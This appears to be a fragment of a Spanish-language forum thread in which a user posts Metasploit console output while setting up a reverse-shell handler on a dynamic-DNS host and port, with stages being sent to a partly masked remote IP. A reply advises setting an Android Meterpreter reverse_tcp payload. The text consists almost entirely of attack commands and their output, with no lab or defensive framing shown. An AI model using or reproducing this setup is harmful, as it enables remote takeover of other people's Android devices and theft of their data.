msf > use exploit/multi/handlermsf exploit(handler) > set LHOST notchoice.noip.meLHOST => notchoice.noip.memsf exploit(handler) > set LPORT 4949LPORT => 4949msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.106:4949 [*] Starting the payload handler...
msf exploit(handler) > set LHOST notchoice.noip.meLHOST => notchoice.noip.memsf exploit(handler) > set LPORT 4949LPORT => 4949msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.106:4949 [*] Starting the payload handler...[*] Sending stage (769536 bytes) to 190.199.xxx.xxx <-------(ESTA ES LA QUE SE AGREGA)
msf exploit(handler) > set LHOST notchoice.noip.meLHOST => notchoice.noip.memsf exploit(handler) > set LPORT 4949LPORT => 4949msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.106:4949 [*] Starting the payload handler...[*] Sending stage (769536 bytes) to 190.199.xxx.xxx[*] Sending stage (769536 bytes) to 190.199.xxx.xxx[*] Sending stage (769536 bytes) to 190.199.xxx.xxx
Por lo que veo en los codigos a la hora de configurar el handler no estas asignando el payload que pondras a la escucha.Código: Textmsf > use exploit/multi/handlermsf exploit(handler) > set payload android/meterpreter/reverse_tcpmsf exploit(handler) > set lhost notchoice.noip.memsf exploit(handler) > exploit